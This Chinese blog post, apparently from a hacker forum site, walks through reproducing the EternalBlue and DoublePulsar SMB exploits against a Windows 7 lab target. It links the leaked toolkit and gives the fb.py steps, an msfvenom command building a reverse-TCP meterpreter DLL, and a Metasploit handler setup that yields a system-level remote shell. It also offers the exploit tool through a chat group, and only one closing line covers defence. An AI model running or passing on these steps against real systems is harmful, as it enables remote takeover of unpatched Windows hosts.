欢迎光临
我们一直在努力

方程式Eternalblue远程溢出漏洞复现:附443端口利用工具

最近方程式的漏洞着实火了一把,根据网友的需求分析了下githup上面的文件目录,找到了利用文件,
主要是针对windows主机的SMB、RDP协议进行攻击,因为我主要根据他们提供的payload的程序,
利用这两个模块eternalblue和Doublepulsar可以对攻击smb和rdp协议

1 .环境搭建

win2003 攻击机:ip:192.168.0.28
kali 攻击机:ip:192.168.0.27
win7 靶机:ip:192.168.0.14

PS:netstat -an 查看端口开发情况,确保445端口开启

方程式Eternalblue远程溢出漏洞复现:附443端口利用工具

另外:win2003攻击机需要安装有python环境,安装python-2.6.6.msi,pywin32-221.win32-py2.6.exe,安装过程不再赘述,安装完成修改系统变量即可。

方程式Eternalblue远程溢出漏洞复现:附443端口利用工具

方程式ETERNALBLUE 下载地址:https://codeload.github.com/misterch0c/shadowbroker/zip/master;下载解压后将其中windows目录的所有文件拷贝之win2003系统中。

方程式Eternalblue远程溢出漏洞复现:附443端口利用工具

在该windows目录下建立一个文件夹为:listeningposts;与fb.py文件中的一致

方程式Eternalblue远程溢出漏洞复现:附443端口利用工具

2.测试过程

进入windows目录。执行python fb.py,设置目标IP与本机IP,重定向选择No;这里由于我的虚拟机没有D盘,所以修改logs文件目录到C盘。
方程式Eternalblue远程溢出漏洞复现:附443端口利用工具
根据提示,输入0创建一个新的项目,项目名为test
方程式Eternalblue远程溢出漏洞复现:附443端口利用工具
接下来使用use Eternalblue,一路回车:
方程式Eternalblue远程溢出漏洞复现:附443端口利用工具
这里要注意,根据提示选项,这里选择1,然后继续一路回车
方程式Eternalblue远程溢出漏洞复现:附443端口利用工具
方程式Eternalblue远程溢出漏洞复现:附443端口利用工具
在kali系统中,利用msf生成一个dll劫持文件,并将s.dll文件拷贝到windows2003的C盘目录下:

1
msfvenom p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.27 LPORT=5555 f dll > /opt/s.dll

方程式Eternalblue远程溢出漏洞复现:附443端口利用工具

在msf下开启msfpaylod监听:

Shell

1
2
3
4
5
use exploit/multi/handler
set lhost 192.168.0.27
set lport 5555
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

方程式Eternalblue远程溢出漏洞复现:附443端口利用工具
接下来继续在windows2003上执行use Doublepulsar
方程式Eternalblue远程溢出漏洞复现:附443端口利用工具
根据提示选择对应系统,运行dll文件,设置dll文件路径
方程式Eternalblue远程溢出漏洞复现:附443端口利用工具
方程式Eternalblue远程溢出漏洞复现:附443端口利用工具
最后在MSF中可以看到,成功反弹shell,拿到系统权限。
方程式Eternalblue远程溢出漏洞复现:附443端口利用工具

3.漏洞利用工具

PS:由于目前软件还未完善,如果有需要的可以加群获取

4.防御措施

所有Windows系统主机使用防火墙过滤/关闭 137、139、445端口,对于3389远程登录,如果不想关闭可以使用智能卡登录功能.

赞(0) 打赏
未经允许不得转载:中国宏阔黑客联盟|白帽黑客|网络渗透技术|网站安全|移动安全|通信安全 » 方程式Eternalblue远程溢出漏洞复现:附443端口利用工具
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏